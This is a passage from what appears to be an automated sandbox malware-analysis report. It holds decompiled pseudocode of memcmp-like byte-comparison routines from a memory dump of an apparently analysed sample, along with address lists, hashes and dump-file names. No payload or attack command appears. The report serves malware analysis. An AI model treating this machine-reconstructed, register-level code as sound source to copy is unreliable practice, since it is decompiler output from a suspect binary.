							__edx =  *(__ecx - 0x1c) & 0x000000ff;
							__esi = ( *(__eax - 0x1c) & 0x000000ff) - ( *(__ecx - 0x1c) & 0x000000ff);
							if(__esi == 0) {
								L12:
								__esi =  *(__eax - 0x1b) & 0x000000ff;
								__edx =  *(__ecx - 0x1b) & 0x000000ff;
								__esi = ( *(__eax - 0x1b) & 0x000000ff) - ( *(__ecx - 0x1b) & 0x000000ff);
								if(__esi != 0) {
									__edx = 0;
									_t31 = (0 | __esi > 0x00000000) - 1; // -1
									__esi = (__esi > 0) + _t31;
								}
								goto L15;
							}
							__edx = 0;
							__edx = 0 | __esi > 0x00000000;
							_t25 = __edx - 1; // -1
							__esi = __edx + _t25;
							if(__edx + _t25 != 0) {
								goto L1;
							}
							goto L12;
						}
						__edx = 0;
						__edx = 0 | __esi > 0x00000000;
						_t19 = __edx - 1; // -1
						__esi = __edx + _t19;
						if(__edx + _t19 != 0) {
							goto L1;
						}
						goto L10;
					}
					__edx = 0;
					__edx = 0 | __esi > 0x00000000;
					_t13 = __edx - 1; // -1
					__esi = __edx + _t13;
					if(__edx + _t13 != 0) {
						goto L1;
					}
					goto L8;
				}
				L1:
				_t192 = _t284;
				goto L3;
			}

0x003c0c45
0x003c0c45
0x003c0c4b
0x003c0cc2
0x003c0cc4
0x003c0cc6
0x00000000
0x00000000
0x003c0ccc
0x003c0cd2
0x003c0d49
0x003c0d4b
0x003c0d4d
0x00000000
0x00000000
0x003c0d53
0x003c0d59
0x003c0dd0
0x003c0dd2
0x003c0dd4
0x00000000
0x00000000
0x003c0dda
0x003c0de0
0x003c0e57
0x003c0e59
0x003c0e5b
0x00000000
0x00000000
0x003c0e61
0x003c0e67
0x003c0ede
0x003c0ee0
0x003c0ee2
0x00000000
0x00000000
0x003c0eee
0x003c0f66
0x003c0f68
0x003c0f6a
0x00000000
0x00000000
0x003c0f70
0x003c0f76
0x003c0fed
0x003c0fef
0x003c0ff1
0x00000000
0x00000000
0x003c0fff
0x003c086b
0x003c086d
0x003c1511
0x003c1511
0x003c100d
0x003c100f
0x003c0c25
0x003c0c2d
0x003c0c2f
0x003c0c3c
0x003c0c3c
0x003c0c3c
0x00000000
0x003c0c2f
0x003c101c
0x003c1022
0x003c1403
0x00000000
0x003c1403
0x00000000
0x003c1028
0x003c0f7f
0x003c0f81
0x003c0f96
0x003c0f9e
0x003c0fa0
0x003c0fb5
0x003c0fbd
0x003c0fbf
0x003c0fd4
0x003c0fdc
0x003c0fde
0x003c0fe7
0x003c0fe7
0x003c0fe7
0x00000000
0x003c0fde
0x003c0fc8
0x003c0fc8
0x003c0fce
0x00000000
0x00000000
0x00000000
0x003c0fce
0x003c0fa9
0x003c0fa9
0x003c0faf
0x00000000
0x00000000
0x00000000
0x003c0faf
0x003c0f8a
0x003c0f8a
0x003c0f90
0x00000000
0x00000000
0x00000000
0x003c0f90
0x003c0ef8
0x003c0efa
0x003c0f0f
0x003c0f17
0x003c0f19
0x003c0f2e
0x003c0f36
0x003c0f38
0x003c0f4d
0x003c0f55
0x003c0f57
0x003c0f60
0x003c0f60
0x003c0f60
0x00000000
0x003c0f57
0x003c0f41
0x003c0f41
0x003c0f47
0x00000000
0x00000000
0x00000000
0x003c0f47
0x003c0f22
0x003c0f22
0x003c0f28
0x00000000
0x00000000
0x00000000
0x003c0f28
0x003c0f03
0x003c0f03
0x003c0f09
0x00000000
0x00000000
0x00000000
0x003c0f09
0x003c0e70
0x003c0e72
0x003c0e87
0x003c0e8f
0x003c0e91
0x003c0ea6
0x003c0eae
0x003c0eb0
0x003c0ec5
0x003c0ecd
0x003c0ecf
0x003c0ed8
0x003c0ed8
0x003c0ed8
0x00000000
0x003c0ecf
0x003c0eb9
0x003c0eb9
0x003c0ebf
0x00000000
0x00000000
0x00000000
0x003c0ebf
0x003c0e9a
0x003c0e9a
0x003c0ea0
0x00000000
0x00000000
0x00000000
0x003c0ea0
0x003c0e7b
0x003c0e7b
0x003c0e81
0x00000000
0x00000000
0x00000000
0x003c0e81
0x003c0de9
0x003c0deb
0x003c0e00
0x003c0e08
0x003c0e0a
0x003c0e1f
0x003c0e27
0x003c0e29
0x003c0e3e
0x003c0e46
0x003c0e48
0x003c0e51
0x003c0e51
0x003c0e51
0x00000000
0x003c0e48
0x003c0e32
0x003c0e32
0x003c0e38
0x00000000
0x00000000
0x00000000
0x003c0e38
0x003c0e13
0x003c0e13
0x003c0e19
0x00000000
0x00000000
0x00000000
0x003c0e19
0x003c0df4
0x003c0df4
0x003c0dfa
0x00000000
0x00000000
0x00000000
0x003c0dfa
0x003c0d62
0x003c0d64
0x003c0d79
0x003c0d81
0x003c0d83
0x003c0d98
0x003c0da0
0x003c0da2
0x003c0db7
0x003c0dbf
0x003c0dc1
0x003c0dca
0x003c0dca
0x003c0dca
0x00000000
0x003c0dc1
0x003c0dab
0x003c0dab
0x003c0db1
0x00000000
0x00000000
0x00000000
0x003c0db1
0x003c0d8c
0x003c0d8c
0x003c0d92
0x00000000
0x00000000
0x00000000
0x003c0d92
0x003c0d6d
0x003c0d6d
0x003c0d73
0x00000000
0x00000000
0x00000000
0x003c0d73
0x003c0cdb
0x003c0cdd
0x003c0cf2
0x003c0cfa
0x003c0cfc
0x003c0d11
0x003c0d19
0x003c0d1b
0x003c0d30
0x003c0d38
0x003c0d3a
0x003c0d43
0x003c0d43
0x003c0d43
0x00000000
0x003c0d3a
0x003c0d24
0x003c0d24
0x003c0d2a
0x00000000
0x00000000
0x00000000
0x003c0d2a
0x003c0d05
0x003c0d05
0x003c0d0b
0x00000000
0x00000000
0x00000000
0x003c0d0b
0x003c0ce6
0x003c0ce6
0x003c0cec
0x00000000
0x00000000
0x00000000
0x003c0c4d
0x003c0c4d
0x003c0c50
0x003c0c54
0x003c0c56
0x003c0c6b
0x003c0c6b
0x003c0c6f
0x003c0c73
0x003c0c75
0x003c0c8a
0x003c0c8a
0x003c0c8e
0x003c0c92
0x003c0c94
0x003c0ca9
0x003c0ca9
0x003c0cad
0x003c0cb1
0x003c0cb3
0x003c0cb5
0x003c0cbc
0x003c0cbc
0x003c0cbc
0x00000000
0x003c0cb3
0x003c0c96
0x003c0c9a
0x003c0c9d
0x003c0c9d
0x003c0ca3
0x00000000
0x00000000
0x00000000
0x003c0ca3
0x003c0c77
0x003c0c7b
0x003c0c7e
0x003c0c7e
0x003c0c84
0x00000000
0x00000000
0x00000000
0x003c0c84
0x003c0c58
0x003c0c5c
0x003c0c5f
0x003c0c5f
0x003c0c65
0x00000000
0x00000000
0x00000000
0x003c0c65
0x003c04ce
0x003c04ce
0x00000000

Memory Dump Source

Source File: 00000000.00000002.376906560.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true

Associated: 00000000.00000002.376889166.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.377032903.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.377073242.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.377090053.00000000003D3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_380000_zGIDlWIotR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0c69e47d847606dd43a020a10b245ffd8c98205713db3c8f796c6159738d0b06
Instruction ID: 1139e794129473f01682d79bc37390b19973bf0e6f90d717132e6ea2b07d46e7
Opcode Fuzzy Hash: 0c69e47d847606dd43a020a10b245ffd8c98205713db3c8f796c6159738d0b06
Instruction Fuzzy Hash: 6DC18F33D0B9F2898B3B462E4418B3FEE626E91B4032BC799DCD47F589C2226D4597D0

Uniqueness

Uniqueness Score: -1.00%

Function 003C0873 Relevance: .3, Instructions: 332
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E003C0873(void* __eax, void* __ecx) {
				void* _t183;
				signed int _t184;
				void* _t187;
				signed char _t192;
				signed char _t193;
				signed char _t194;
				signed char _t195;
				signed char _t197;
				signed int _t271;
				void* _t274;
				void* _t276;
				void* _t278;
				void* _t281;
				void* _t283;
				void* _t285;
				void* _t288;
				void* _t290;
				void* _t292;
				void* _t295;
				void* _t297;
				void* _t299;
				void* _t302;
				void* _t304;
				void* _t306;
				void* _t309;
				void* _t311;
				void* _t313;

				_t187 = __ecx;
				_t183 = __eax;
				if( *((intOrPtr*)(__eax - 0x1d)) ==  *((intOrPtr*)(__ecx - 0x1d))) {
					_t271 = 0;
					L12:
					if(_t271 != 0) {
						goto L1;
					}
					_t192 =  *(_t183 - 0x19);
					if(_t192 ==  *(_t187 - 0x19)) {
						_t271 = 0;
						L23:
						if(_t271 != 0) {
							goto L1;
						}
						_t193 =  *(_t183 - 0x15);
						if(_t193 ==  *(_t187 - 0x15)) {
							_t271 = 0;
							L34:
							if(_t271 != 0) {
								goto L1;
							}
							_t194 =  *(_t183 - 0x11);
							if(_t194 ==  *(_t187 - 0x11)) {
								_t271 = 0;
								L45:
								if(_t271 != 0) {
									goto L1;
								}
								_t195 =  *(_t183 - 0xd);
								if(_t195 ==  *(_t187 - 0xd)) {
									_t271 = 0;
									L56:
									if(_t271 != 0) {
										goto L1;
									}
									if( *(_t183 - 9) ==  *(_t187 - 9)) {
										_t271 = 0;
										L67:
										if(_t271 != 0) {
											goto L1;
										}
										_t197 =  *(_t183 - 5);
										if(_t197 ==  *(_t187 - 5)) {
											_t271 = 0;
											L78:
											if(_t271 != 0) {
												goto L1;
											}
											_t184 = ( *(_t183 - 1) & 0x000000ff) - ( *(_t187 - 1) & 0x000000ff);
											if(_t184 != 0) {
												_t182 = (0 | _t184 > 0x00000000) - 1; // -1
												_t184 = (_t184 > 0) + _t182;
											}
											L2:
											return _t184;
										}
										_t274 = (_t197 & 0x000000ff) - ( *(_t187 - 5) & 0x000000ff);
										if(_t274 == 0) {
											L71:
											_t276 = ( *(_t183 - 4) & 0x000000ff) - ( *(_t187 - 4) & 0x000000ff);
											if(_t276 == 0) {
												L73:
												_t278 = ( *(_t183 - 3) & 0x000000ff) - ( *(_t187 - 3) & 0x000000ff);
												if(_t278 == 0) {
													L75:
													_t271 = ( *(_t183 - 2) & 0x000000ff) - ( *(_t187 - 2) & 0x000000ff);
													if(_t271 != 0) {
														_t176 = (0 | _t271 > 0x00000000) - 1; // -1
														_t271 = (_t271 > 0) + _t176;
													}
													goto L78;
												}
												_t170 = (0 | _t278 > 0x00000000) - 1; // -1
												_t271 = (_t278 > 0) + _t170;
												if(_t271 != 0) {
													goto L1;
												}
												goto L75;
											}
											_t164 = (0 | _t276 > 0x00000000) - 1; // -1
											_t271 = (_t276 > 0) + _t164;
											if(_t271 != 0) {
												goto L1;
											}
											goto L73;
										}
										_t158 = (0 | _t274 > 0x00000000) - 1; // -1
										_t271 = (_t274 > 0) + _t158;
										if(_t271 != 0) {
											goto L1;
										}
										goto L71;
									}
									_t281 = ( *(_t183 - 9) & 0x000000ff) - ( *(_t187 - 9) & 0x000000ff);
									if(_t281 == 0) {
										L60:
										_t283 = ( *(_t183 - 8) & 0x000000ff) - ( *(_t187 - 8) & 0x000000ff);
										if(_t283 == 0) {
											L62:
											_t285 = ( *(_t183 - 7) & 0x000000ff) - ( *(_t187 - 7) & 0x000000ff);
											if(_t285 == 0) {
												L64:
												_t271 = ( *(_t183 - 6) & 0x000000ff) - ( *(_t187 - 6) & 0x000000ff);
												if(_t271 != 0) {
													_t151 = (0 | _t271 > 0x00000000) - 1; // -1
													_t271 = (_t271 > 0) + _t151;
												}
												goto L67;
											}
											_t145 = (0 | _t285 > 0x00000000) - 1; // -1
											_t271 = (_t285 > 0) + _t145;
											if(_t271 != 0) {
												goto L1;
											}
											goto L64;
										}
										_t139 = (0 | _t283 > 0x00000000) - 1; // -1
										_t271 = (_t283 > 0) + _t139;
										if(_t271 != 0) {
											goto L1;
										}
										goto L62;
									}
									_t133 = (0 | _t281 > 0x00000000) - 1; // -1
									_t271 = (_t281 > 0) + _t133;
									if(_t271 != 0) {
										goto L1;
									}
									goto L60;
								}
								_t288 = (_t195 & 0x000000ff) - ( *(_t187 - 0xd) & 0x000000ff);
								if(_t288 == 0) {
									L49:
									_t290 = ( *(_t183 - 0xc) & 0x000000ff) - ( *(_t187 - 0xc) & 0x000000ff);
									if(_t290 == 0) {
										L51:
										_t292 = ( *(_t183 - 0xb) & 0x000000ff) - ( *(_t187 - 0xb) & 0x000000ff);
										if(_t292 == 0) {
											L53:
											_t271 = ( *(_t183 - 0xa) & 0x000000ff) - ( *(_t187 - 0xa) & 0x000000ff);
											if(_t271 != 0) {
												_t125 = (0 | _t271 > 0x00000000) - 1; // -1
												_t271 = (_t271 > 0) + _t125;
											}
											goto L56;
										}
										_t119 = (0 | _t292 > 0x00000000) - 1; // -1
										_t271 = (_t292 > 0) + _t119;
										if(_t271 != 0) {
											goto L1;
										}
										goto L53;
									}
									_t113 = (0 | _t290 > 0x00000000) - 1; // -1
									_t271 = (_t290 > 0) + _t113;
									if(_t271 != 0) {
										goto L1;
									}
									goto L51;
								}
								_t107 = (0 | _t288 > 0x00000000) - 1; // -1
								_t271 = (_t288 > 0) + _t107;
								if(_t271 != 0) {
									goto L1;
								}
								goto L49;
							}
							_t295 = (_t194 & 0x000000ff) - ( *(_t187 - 0x11) & 0x000000ff);
							if(_t295 == 0) {
								L38:
								_t297 = ( *(_t183 - 0x10) & 0x000000ff) - ( *(_t187 - 0x10) & 0x000000ff);
								if(_t297 == 0) {
									L40:
									_t299 = ( *(_t183 - 0xf) & 0x000000ff) - ( *(_t187 - 0xf) & 0x000000ff);
									if(_t299 == 0) {
										L42:
										_t271 = ( *(_t183 - 0xe) & 0x000000ff) - ( *(_t187 - 0xe) & 0x000000ff);
										if(_t271 != 0) {
											_t100 = (0 | _t271 > 0x00000000) - 1; // -1
											_t271 = (_t271 > 0) + _t100;
										}
										goto L45;
									}
									_t94 = (0 | _t299 > 0x00000000) - 1; // -1
									_t271 = (_t299 > 0) + _t94;
									if(_t271 != 0) {
										goto L1;
									}
									goto L42;
								}
								_t88 = (0 | _t297 > 0x00000000) - 1; // -1
								_t271 = (_t297 > 0) + _t88;
								if(_t271 != 0) {
									goto L1;
								}
								goto L40;
							}
							_t82 = (0 | _t295 > 0x00000000) - 1; // -1
							_t271 = (_t295 > 0) + _t82;
							if(_t271 != 0) {
								goto L1;
							}
							goto L38;
						}
						_t302 = (_t193 & 0x000000ff) - ( *(_t187 - 0x15) & 0x000000ff);
						if(_t302 == 0) {
							L27:
							_t304 = ( *(_t183 - 0x14) & 0x000000ff) - ( *(_t187 - 0x14) & 0x000000ff);
							if(_t304 == 0) {
								L29:
								_t306 = ( *(_t183 - 0x13) & 0x000000ff) - ( *(_t187 - 0x13) & 0x000000ff);
								if(_t306 == 0) {
									L31:
									_t271 = ( *(_t183 - 0x12) & 0x000000ff) - ( *(_t187 - 0x12) & 0x000000ff);
									if(_t271 != 0) {
										_t75 = (0 | _t271 > 0x00000000) - 1; // -1
										_t271 = (_t271 > 0) + _t75;
									}
									goto L34;
								}
								_t69 = (0 | _t306 > 0x00000000) - 1; // -1
								_t271 = (_t306 > 0) + _t69;
								if(_t271 != 0) {
									goto L1;
								}
								goto L31;
							}
							_t63 = (0 | _t304 > 0x00000000) - 1; // -1
							_t271 = (_t304 > 0) + _t63;
							if(_t271 != 0) {
								goto L1;
							}
							goto L29;
						}
						_t57 = (0 | _t302 > 0x00000000) - 1; // -1
						_t271 = (_t302 > 0) + _t57;
						if(_t271 != 0) {
							goto L1;
						}
						goto L27;
					}
					_t309 = (_t192 & 0x000000ff) - ( *(_t187 - 0x19) & 0x000000ff);
					if(_t309 == 0) {
						L16:
						_t311 = ( *(_t183 - 0x18) & 0x000000ff) - ( *(_t187 - 0x18) & 0x000000ff);
						if(_t311 == 0) {
							L18:
							_t313 = ( *(_t183 - 0x17) & 0x000000ff) - ( *(_t187 - 0x17) & 0x000000ff);
							if(_t313 == 0) {
								L20:
								_t271 = ( *(_t183 - 0x16) & 0x000000ff) - ( *(_t187 - 0x16) & 0x000000ff);
								if(_t271 != 0) {
									_t50 = (0 | _t271 > 0x00000000) - 1; // -1
									_t271 = (_t271 > 0) + _t50;
								}
								goto L23;
							}
							_t44 = (0 | _t313 > 0x00000000) - 1; // -1
							_t271 = (_t313 > 0) + _t44;
							if(_t271 != 0) {
								goto L1;
							}
							goto L20;
						}
						_t38 = (0 | _t311 > 0x00000000) - 1; // -1
						_t271 = (_t311 > 0) + _t38;
						if(_t271 != 0) {
							goto L1;
						}
						goto L18;
					}
					_t32 = (0 | _t309 > 0x00000000) - 1; // -1
					_t271 = (_t309 > 0) + _t32;
					if(_t271 != 0) {
						goto L1;
					}
					goto L16;
				} else {
					__esi = __dl & 0x000000ff;
					__edx =  *(__ecx - 0x1d) & 0x000000ff;
					__esi = (__dl & 0x000000ff) - ( *(__ecx - 0x1d) & 0x000000ff);
					if(__esi == 0) {
						L5:
						__esi =  *(__eax - 0x1c) & 0x000000ff;
						__edx =  *(__ecx - 0x1c) & 0x000000ff;
						__esi = ( *(__eax - 0x1c) & 0x000000ff) - ( *(__ecx - 0x1c) & 0x000000ff);
						if(__esi == 0) {
							L7:
							__esi =  *(__eax - 0x1b) & 0x000000ff;
							__edx =  *(__ecx - 0x1b) & 0x000000ff;
							__esi = ( *(__eax - 0x1b) & 0x000000ff) - ( *(__ecx - 0x1b) & 0x000000ff);
							if(__esi == 0) {
								L9:
								__esi =  *(__eax - 0x1a) & 0x000000ff;
								__edx =  *(__ecx - 0x1a) & 0x000000ff;
								__esi = ( *(__eax - 0x1a) & 0x000000ff) - ( *(__ecx - 0x1a) & 0x000000ff);
								if(__esi != 0) {
									__edx = 0;
									_t25 = (0 | __esi > 0x00000000) - 1; // -1
									__esi = (__esi > 0) + _t25;
								}
								goto L12;
							}
							__edx = 0;
							__edx = 0 | __esi > 0x00000000;
							_t19 = __edx - 1; // -1
							__esi = __edx + _t19;
							if(__edx + _t19 != 0) {
								goto L1;
							}
							goto L9;
						}
						__edx = 0;
						__edx = 0 | __esi > 0x00000000;
						_t13 = __edx - 1; // -1
						__esi = __edx + _t13;
						if(__edx + _t13 != 0) {
							goto L1;
						}
						goto L7;
					}
					__edx = 0;
					__edx = 0 | __esi > 0x00000000;
					_t7 = __edx - 1; // -1
					__esi = __edx + _t7;
					if(__edx + _t7 != 0) {
						goto L1;
					}
					goto L5;
				}
				L1:
				_t184 = _t271;
				goto L2;
			}

0x003c0873
0x003c0873
0x003c0879
0x003c08f0
0x003c08f2
0x003c08f4
0x00000000
0x00000000
0x003c08fa
0x003c0900
0x003c0977
0x003c0979
0x003c097b
0x00000000
0x00000000
0x003c0981
0x003c0987
0x003c09fe
0x003c0a00
0x003c0a02
0x00000000
0x00000000
0x003c0a08
0x003c0a0e
0x003c0a85
0x003c0a87
0x003c0a89
0x00000000
0x00000000
0x003c0a8f
0x003c0a95
0x003c0b0c
0x003c0b0e
0x003c0b10
0x00000000
0x00000000
0x003c0b1c
0x003c0b94
0x003c0b96
0x003c0b98
0x00000000
0x00000000
0x003c0b9e
0x003c0ba4
0x003c0c1b
0x003c0c1d
0x003c0c1f
0x00000000
0x00000000
0x003c0c2d
0x003c0c2f
0x003c0c3c
0x003c0c3c
0x003c0c3c
0x003c086d
0x003c1511
0x003c1511
0x003c0bad
0x003c0baf
0x003c0bc4
0x003c0bcc
0x003c0bce
0x003c0be3
0x003c0beb
0x003c0bed
0x003c0c02
0x003c0c0a
0x003c0c0c
0x003c0c15
0x003c0c15
0x003c0c15
0x00000000
0x003c0c0c
0x003c0bf6
0x003c0bf6
0x003c0bfc
0x00000000
0x00000000
0x00000000
0x003c0bfc
0x003c0bd7
0x003c0bd7
0x003c0bdd
0x00000000
0x00000000
0x00000000
0x003c0bdd
0x003c0bb8
0x003c0bb8
0x003c0bbe
0x00000000
0x00000000
0x00000000
0x003c0bbe
0x003c0b26
0x003c0b28
0x003c0b3d
0x003c0b45
0x003c0b47
0x003c0b5c
0x003c0b64
0x003c0b66
0x003c0b7b
0x003c0b83
0x003c0b85
0x003c0b8e
0x003c0b8e
0x003c0b8e
0x00000000
0x003c0b85
0x003c0b6f
0x003c0b6f
0x003c0b75
0x00000000
0x00000000
0x00000000
0x003c0b75
0x003c0b50
0x003c0b50
0x003c0b56
0x00000000
0x00000000
0x00000000
0x003c0b56
0x003c0b31
0x003c0b31
0x003c0b37
0x00000000
0x00000000
0x00000000
0x003c0b37
0x003c0a9e
0x003c0aa0
0x003c0ab5
0x003c0abd
0x003c0abf
0x003c0ad4
0x003c0adc
0x003c0ade
0x003c0af3
0x003c0afb
0x003c0afd
0x003c0b06
0x003c0b06
0x003c0b06
0x00000000
0x003c0afd
0x003c0ae7
0x003c0ae7
0x003c0aed
0x00000000
0x00000000
0x00000000
0x003c0aed
0x003c0ac8
0x003c0ac8
0x003c0ace
0x00000000
0x00000000
0x00000000
0x003c0ace
0x003c0aa9
0x003c0aa9
0x003c0aaf
0x00000000
0x00000000
0x00000000
0x003c0aaf
0x003c0a17
0x003c0a19
0x003c0a2e
0x003c0a36
0x003c0a38
0x003c0a4d
0x003c0a55
0x003c0a57
0x003c0a6c
0x003c0a74
0x003c0a76
0x003c0a7f
0x003c0a7f
0x003c0a7f
0x00000000
0x003c0a76
0x003c0a60
0x003c0a60
0x003c0a66
0x00000000
0x00000000
0x00000000
0x003c0a66
0x003c0a41
0x003c0a41
0x003c0a47
0x00000000
0x00000000
0x00000000
0x003c0a47
0x003c0a22
0x003c0a22
0x003c0a28
0x00000000
0x00000000
0x00000000
0x003c0a28
0x003c0990
0x003c0992
0x003c09a7
0x003c09af
0x003c09b1
0x003c09c6
0x003c09ce
0x003c09d0
0x003c09e5
0x003c09ed
0x003c09ef
0x003c09f8
0x003c09f8
0x003c09f8
0x00000000
0x003c09ef
0x003c09d9
0x003c09d9
0x003c09df
0x00000000
0x00000000
0x00000000
0x003c09df
0x003c09ba
0x003c09ba
0x003c09c0
0x00000000
0x00000000
0x00000000
0x003c09c0
0x003c099b
0x003c099b
0x003c09a1
0x00000000
0x00000000
0x00000000
0x003c09a1
0x003c0909
0x003c090b
0x003c0920
0x003c0928
0x003c092a
0x003c093f
0x003c0947
0x003c0949
0x003c095e
0x003c0966
0x003c0968
0x003c0971
0x003c0971
0x003c0971
0x00000000
0x003c0968
0x003c0952
0x003c0952
0x003c0958
0x00000000
0x00000000
0x00000000
0x003c0958
0x003c0933
0x003c0933
0x003c0939
0x00000000
0x00000000
0x00000000
0x003c0939
0x003c0914
0x003c0914
0x003c091a
0x00000000
0x00000000
0x00000000
0x003c087b
0x003c087b
0x003c087e
0x003c0882
0x003c0884
0x003c0899
0x003c0899
0x003c089d
0x003c08a1
0x003c08a3
0x003c08b8
0x003c08b8
0x003c08bc
0x003c08c0
0x003c08c2
0x003c08d7
0x003c08d7
0x003c08db
0x003c08df
0x003c08e1
0x003c08e3
0x003c08ea
0x003c08ea
0x003c08ea
0x00000000
0x003c08e1
0x003c08c4
0x003c08c8
0x003c08cb
0x003c08cb
0x003c08d1
0x00000000
0x00000000
0x00000000
0x003c08d1
0x003c08a5
0x003c08a9
0x003c08ac
0x003c08ac
0x003c08b2
0x00000000
0x00000000
0x00000000
0x003c08b2
0x003c0886
0x003c088a
0x003c088d
0x003c088d
0x003c0893
0x00000000
0x00000000
0x00000000
0x003c0893
0x003c04ce
0x003c04ce
0x00000000

Memory Dump Source

Source File: 00000000.00000002.376906560.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true

Associated: 00000000.00000002.376889166.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.377032903.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.377073242.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.377090053.00000000003D3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_380000_zGIDlWIotR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 21018234ac6c65dce347e9eb3c09d9e563dc327998c84d170fb29f747537f1fa
Instruction ID: 07db096068302333dfb0f77807f95d814ecf6a14a459ae904f2826b89a28435b
Opcode Fuzzy Hash: 21018234ac6c65dce347e9eb3c09d9e563dc327998c84d170fb29f747537f1fa
Instruction Fuzzy Hash: F8C15E73D0B5F2898B3F852E0458B3BEE616E81B4032BC399DDD47F589C222AD459BD0

Uniqueness

Uniqueness Score: -1.00%

Function 003C04D5 Relevance: .3, Instructions: 326
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E003C04D5(void* __eax, void* __ecx) {
				void* _t177;
				signed int _t178;
				void* _t181;
				signed char _t186;
				signed char _t187;
				signed char _t188;
				signed char _t190;
				signed char _t191;
				signed int _t197;
				signed int _t263;
				void* _t266;
				void* _t268;
				void* _t270;
				void* _t272;
				void* _t274;
				void* _t276;
				void* _t279;
				void* _t281;
				void* _t283;
				void* _t286;
				void* _t288;
				void* _t290;
				void* _t293;
				void* _t295;
				void* _t297;
				void* _t300;
				void* _t302;
				void* _t304;

				_t181 = __ecx;
				_t177 = __eax;
				if( *((intOrPtr*)(__eax - 0x1c)) ==  *((intOrPtr*)(__ecx - 0x1c))) {
					_t263 = 0;
					L11:
					if(_t263 != 0) {
						goto L1;
					}
					_t186 =  *(_t177 - 0x18);
					if(_t186 ==  *(_t181 - 0x18)) {
						_t263 = 0;
						L22:
						if(_t263 != 0) {
							goto L1;
						}
						_t187 =  *(_t177 - 0x14);
						if(_t187 ==  *(_t181 - 0x14)) {
							_t263 = 0;
							L33:
							if(_t263 != 0) {
								goto L1;
							}
							_t188 =  *(_t177 - 0x10);
							if(_t188 ==  *(_t181 - 0x10)) {
								_t263 = 0;
								L44:
								if(_t263 != 0) {
									goto L1;
								}
								if( *(_t177 - 0xc) ==  *(_t181 - 0xc)) {
									_t263 = 0;
									L55:
									if(_t263 != 0) {
										goto L1;
									}
									_t190 =  *(_t177 - 8);
									if(_t190 ==  *(_t181 - 8)) {
										_t263 = 0;
										L66:
										if(_t263 != 0) {
											goto L1;
										}
										_t191 =  *(_t177 - 4);
										if(_t191 ==  *(_t181 - 4)) {
											_t178 = 0;
											L78:
											if(_t178 == 0) {
												_t178 = 0;
											}
											L80:
											return _t178;
										}
										_t266 = (_t191 & 0x000000ff) - ( *(_t181 - 4) & 0x000000ff);
										if(_t266 == 0) {
											L70:
											_t268 = ( *(_t177 - 3) & 0x000000ff) - ( *(_t181 - 3) & 0x000000ff);
											if(_t268 == 0) {
												L72:
												_t270 = ( *(_t177 - 2) & 0x000000ff) - ( *(_t181 - 2) & 0x000000ff);
												if(_t270 == 0) {
													L75:
													_t178 = ( *(_t177 - 1) & 0x000000ff) - ( *(_t181 - 1) & 0x000000ff);
													if(_t178 != 0) {
														_t176 = (0 | _t178 > 0x00000000) - 1; // -1
														_t178 = (_t178 > 0) + _t176;
													}
													goto L78;
												}
												_t197 = (0 | _t270 > 0x00000000) + (0 | _t270 > 0x00000000) - 1;
												if(_t197 == 0) {
													goto L75;
												}
												L74:
												_t178 = _t197;
												goto L78;
											}
											_t197 = (0 | _t268 > 0x00000000) + (0 | _t268 > 0x00000000) - 1;
											if(_t197 != 0) {
												goto L74;
											}
											goto L72;
										}
										_t197 = (0 | _t266 > 0x00000000) + (0 | _t266 > 0x00000000) - 1;
										if(_t197 != 0) {
											goto L74;
										}
										goto L70;
									}
									_t272 = (_t190 & 0x000000ff) - ( *(_t181 - 8) & 0x000000ff);
									if(_t272 == 0) {
										L59:
										_t274 = ( *(_t177 - 7) & 0x000000ff) - ( *(_t181 - 7) & 0x000000ff);
										if(_t274 == 0) {
											L61:
											_t276 = ( *(_t177 - 6) & 0x000000ff) - ( *(_t181 - 6) & 0x000000ff);
											if(_t276 == 0) {
												L63:
												_t263 = ( *(_t177 - 5) & 0x000000ff) - ( *(_t181 - 5) & 0x000000ff);
												if(_t263 != 0) {
													_t151 = (0 | _t263 > 0x00000000) - 1; // -1
													_t263 = (_t263 > 0) + _t151;
												}
												goto L66;
											}
											_t145 = (0 | _t276 > 0x00000000) - 1; // -1
											_t263 = (_t276 > 0) + _t145;
											if(_t263 != 0) {
												goto L1;
											}
											goto L63;
										}
										_t139 = (0 | _t274 > 0x00000000) - 1; // -1
										_t263 = (_t274 > 0) + _t139;
										if(_t263 != 0) {
											goto L1;
										}
										goto L61;
									}
									_t133 = (0 | _t272 > 0x00000000) - 1; // -1
									_t263 = (_t272 > 0) + _t133;
									if(_t263 != 0) {
										goto L1;
									}
									goto L59;
								}
								_t279 = ( *(_t177 - 0xc) & 0x000000ff) - ( *(_t181 - 0xc) & 0x000000ff);
								if(_t279 == 0) {
									L48:
									_t281 = ( *(_t177 - 0xb) & 0x000000ff) - ( *(_t181 - 0xb) & 0x000000ff);
									if(_t281 == 0) {
										L50:
										_t283 = ( *(_t177 - 0xa) & 0x000000ff) - ( *(_t181 - 0xa) & 0x000000ff);
										if(_t283 == 0) {
											L52:
											_t263 = ( *(_t177 - 9) & 0x000000ff) - ( *(_t181 - 9) & 0x000000ff);
											if(_t263 != 0) {
												_t126 = (0 | _t263 > 0x00000000) - 1; // -1
												_t263 = (_t263 > 0) + _t126;
											}
											goto L55;
										}
										_t120 = (0 | _t283 > 0x00000000) - 1; // -1
										_t263 = (_t283 > 0) + _t120;
										if(_t263 != 0) {
											goto L1;
										}
										goto L52;
									}
									_t114 = (0 | _t281 > 0x00000000) - 1; // -1
									_t263 = (_t281 > 0) + _t114;
									if(_t263 != 0) {
										goto L1;
									}
									goto L50;
								}
